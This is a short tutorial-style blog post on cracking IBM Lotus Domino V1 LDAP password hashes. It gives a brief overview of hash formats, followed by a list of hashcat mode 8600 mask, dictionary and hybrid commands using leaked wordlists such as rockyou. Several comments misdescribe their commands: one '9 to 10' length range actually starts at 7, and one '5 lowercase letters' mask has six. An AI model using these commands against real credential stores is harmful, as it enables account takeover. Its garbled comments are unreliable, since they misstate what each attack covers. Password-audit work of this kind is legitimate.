If you have an IBM Lotus Domino LDAP server, you should know password hashes can be easily cracked. Actually, there are three versions of the hash algoritms:
- Version 1: 32 characters long, hexadecimal character set (
A-F
,0-9
), starts and ends in parentheses - Version 2: 22 characters long, extended character set (
A-Z
including upper and lower case,0-9
plus special characters), starts with(G
and ends in)
- Version 3: 51 characters long, same character set as version 2, starts with
(H
and ends in)
You can read more details about those algoritms at the following link: Understanding IBM Domino password hashes
In this post we will see how to break V1 password hashes. First of all, download hashcat and search for good dictionaries (weakpass is an awesome resource… ssssh!). Then, before starting with the cracking process, look at mask attack documentation to better understand all charsets used in hashcat.
Good, now you are ready to start…
# All passwords having any-char and length from 1 to 6
hashcat -m 8600 --increment --increment-min=1 -a 3 hashes.txt ?a?a?a?a?a?a
# All [a-z0-9] passwords having length from 7 to 8
hashcat -m 8600 --increment --increment-min=7 -1 ?l?d -a 3 hashes.txt ?1?1?1?1?1?1?1?1
# All numeric passwords having length from 9 to 10
hashcat -m 8600 --increment --increment-min=7 -a 3 hashes.txt ?d?d?d?d?d?d?d?d?d?d
# All passwords having 5 lowercase letters and 3 numbers
hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l?l?d?d?d
# All passwords having 5 lowercase letters, 1 dot and 2 numbers
hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l.?d?d
# All passwords having 1 any-char, 5 lowercase letters, 1 any-char and 1 number
hashcat -m 8600 -a 3 hashes.txt ?a?l?l?l?l?l?a?d
# All passwords having 1 [a-zA-Z] char, 6 lowercase letters and 2 numbers
hashcat -m 8600 -1 ?l?u -a 3 hashes.txt ?1?l?l?l?l?l?l?d?d
# All passwords contained in dictionaries
hashcat -m 8600 -a 0 hashes.txt dictionaries/weakpass_2
hashcat -m 8600 -a 0 hashes.txt dictionaries/HashesOrg
# All passwords combining words in dictionaries and masks
hashcat -m 8600 -1 ?l?u?d -a 6 hashes.txt dictionaries/rockyou.txt ?1?1
hashcat -m 8600 -a 6 hashes.txt dictionaries/rockyou.txt ?d?d?d
hashcat -m 8600 -a 6 hashes.txt dictionaries/hk_hlm_founds.txt ?a
# All passwords combining masks and words in dictionaries
hashcat -m 8600 -1 ?l?u?d -a 7 hashes.txt ?1?1 dictionaries/rockyou.txt
hashcat -m 8600 -a 7 hashes.txt ?d?d?d dictionaries/rockyou.txt
hashcat -m 8600 -a 7 hashes.txt ?a dictionaries/hk_hlm_founds.txt